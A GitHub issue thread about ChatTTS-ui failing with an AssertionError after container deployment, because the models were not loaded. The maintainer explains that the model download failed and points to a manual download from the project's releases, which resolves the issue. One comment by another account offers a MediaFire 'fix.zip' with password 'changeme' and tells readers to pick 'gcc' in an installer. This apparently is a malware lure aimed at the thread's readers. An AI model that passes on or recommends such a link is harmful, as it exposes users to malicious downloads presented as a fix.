### ISSUE TITLE
Ubuntu服务器上使用容器部署没问题，但请求后就报错！

### ISSUE THREAD

**Issue by frozamilan1899** [jianchang512/ChatTTS-ui#237]
```
voice='6666.pt'
当前使用音色 seed_path='/app/speaker/6666.pt'
prompt='[break_6]'
te=['你好，我是兔子 [uv_break] ']
WARNING:ChatTTS.core:vocos not initialized.
WARNING:ChatTTS.core:gpt not initialized.
WARNING:ChatTTS.core:tokenizer not initialized.
WARNING:ChatTTS.core:decoder not initialized.
[2024-08-28 09:20:08,365] ERROR in app: Exception on /tts [POST]
Traceback (most recent call last):
  File "/home/venv/lib/python3.9/site-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/home/venv/lib/python3.9/site-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/home/venv/lib/python3.9/site-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/home/venv/lib/python3.9/site-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/app/app.py", line 264, in tts
    wavs = chat.infer(
  File "/app/ChatTTS/core.py", line 233, in infer
    return next(res_gen)
  File "/app/ChatTTS/core.py", line 354, in _infer
    assert self.has_loaded(use_decoder=use_decoder)
AssertionError
```
这是缺了什么？

**Comment by jianchang512** [comment]
模型下载失败。确保可以顺畅连接github
手动下载

```
默认将在第一次运行时自动下载模型，如果网络问题下载失败，请手动下载

下载地址： https://github.com/jianchang512/ChatTTS-ui/releases/download/v1.0/all-models.7z

下载后解压后，会看到asset文件夹，该文件夹内有多个pt文件，将所有pt文件复制到本目录下，然后重启软件


```

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by frozamilan1899** [comment]
@jianchang512 解决了，谢谢。我本来想提醒你把手动下载写在README，今天看到你自己更新了，手动点赞！
